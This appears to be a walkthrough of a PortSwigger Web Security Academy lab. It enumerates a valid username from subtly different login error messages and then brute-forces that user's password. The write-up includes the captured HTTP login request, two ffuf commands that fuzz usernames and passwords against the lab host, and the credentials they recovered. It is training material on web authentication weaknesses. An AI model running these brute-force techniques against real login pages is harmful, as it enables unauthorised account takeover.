This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

-   [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
-   [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

# Practical
So this time the response is a just subtly different, let's check out the login page first.
Looks like this time it just says 'Invalid username or password.'
So if it's a subtle change, it's must be either a typo or forgot something in the text.

Let's check out the request made.

```html
POST /login HTTP/1.1
Host: target-ac8e1f981e5bdb0b80b61b6a00ee00c5.web-security-academy.net
Cookie: session=cIbTLgOa2x6ZNtoa1q5tkWL3OP5I7MEb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: https://target-ac8e1f981e5bdb0b80b61b6a00ee00c5.web-security-academy.net
Dnt: 1
Referer: https://target-ac8e1f981e5bdb0b80b61b6a00ee00c5.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close

username=admin&password=1
```
Again a POST request to /login with username and password.
I tried this in Burp Intruder, but I couldn't spot any changes in length and it seemed random and wasn't very pleasing, so I turned to ffuf again.

After looking at the requests made in ffuf, I could conclude that I could filter out the word count, I saw that 1151 and 1156 was repeated a lot so I filtered those out.
```bash
ffuf -w usernames.txt -X POST -d "username=FUZZ&password=1" -u https://target-ac8e1f981e5bdb0b80b61b6a00ee00c5.web-security-academy.net/login -fw 1151,1156
```
And  I was able to get this:
```txt
afiliados               [Status: 200, Size: 3104, Words: 1157, Lines: 65]
```
The word count this time is different, let's test out this username in the login page.
And this time we get 'Invalid username or password', notice that the period is gone.
So we have identified the subtle change, now let's find out the password.

And since we know that if we logged in successfully, we're going to be redirected so we should find a request with a status code 302.
Let's do that in ffuf.
```bash
ffuf -w passwords.txt -X POST -d "username=afiliados&password=FUZZ" -u https://target-ac8e1f981e5bdb0b80b61b6a00ee00c5.web-security-academy.net/login -mc 302
```
And we get.
```bash
1234567                 [Status: 302, Size: 0, Words: 1, Lines: 1]
```
Let's try logging in.
```bash
afiliados.1234567
```
And we're able to and solved the lab!